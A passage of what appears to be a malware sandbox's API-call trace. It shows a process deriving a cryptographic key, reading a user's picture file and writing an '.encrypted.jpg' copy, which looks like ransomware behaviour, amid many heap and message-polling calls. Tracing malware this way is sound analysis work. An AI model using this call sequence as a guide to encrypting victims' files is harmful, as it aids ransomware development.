cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.234] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.234] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.234] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.234] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.234] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.234] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.234] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0041.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.234] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.234] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0041.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.235] CryptDestroyHash (hHash=0x7c2240) returned 1 [0041.235] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.235] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.235] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.235] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.235] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\zsk4r.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.235] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.235] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.235] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0041.236] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.236] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0041.237] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci")) returned 0x10 [0041.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0041.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0041.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0041.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.238] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.encrypted.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\zsk4r.encrypted.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.241] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0041.241] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0041.241] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0041.241] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0041.242] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.242] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0041.244] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x4480, lpOverlapped=0x0) returned 1 [0041.245] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14480) returned 0xac2018 [0041.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0041.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14480) returned 0x935008 [0041.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.249] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14480) returned 0xac2018 [0041.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.249] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0041.249] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.250] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14480) returned 0xac2018 [0041.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0041.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889430 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0041.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14480) returned 0x949490 [0041.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0041.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.252] RtlAllocateHeap 